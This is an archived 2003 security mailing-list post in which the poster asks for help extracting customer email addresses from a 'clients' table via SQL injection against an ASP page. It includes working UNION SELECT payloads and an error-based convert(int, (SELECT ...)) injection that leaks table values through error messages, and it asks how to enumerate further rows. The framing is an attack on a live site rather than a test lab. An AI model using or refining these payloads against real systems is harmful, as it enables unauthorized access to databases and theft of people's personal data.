SQL injection - get more values

From: Daniel Savi (dssat_private)
Date: Wed Feb 12 2003 - 09:48:41 PST

  • Next message: Martin Walker: "RE: how to isolate a virtual hosted website, in order to do a A&P?"

    
     ('binary' encoding is not supported, stored as-is)
    Hi :)
    
    i'm trying to get some info from clients table and email field....
    
    i try this param into gubpage.asp?=...
    ') union select sum(email) from clients--
    and got error about all queries needed...so, i tryed to solve with
    ') union select sum(email),1,1,1.... from clients--
    until i get: operand type clash: text is incompatible with int 
    
    i found this answer into this forum (thanks :)), was:
    ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
    
    i got this: 
    Syntax error converting the varchar value 'anonat_private' to a column of 
    data type int
    
    Now, my problem: How can i get other e-mail from table knowing one valid 
    value?
    
    i try this
    ' %2b convert(int, (SELECT email FROM clients WHERE email 
    > 'anonat_private')) %2b '
    but no success
    
    i think i can use NOT iN, but not sure how to use with convert...
    
    Any tip are welcome!
    
    Thanks
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    



    This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 10:35:19 PST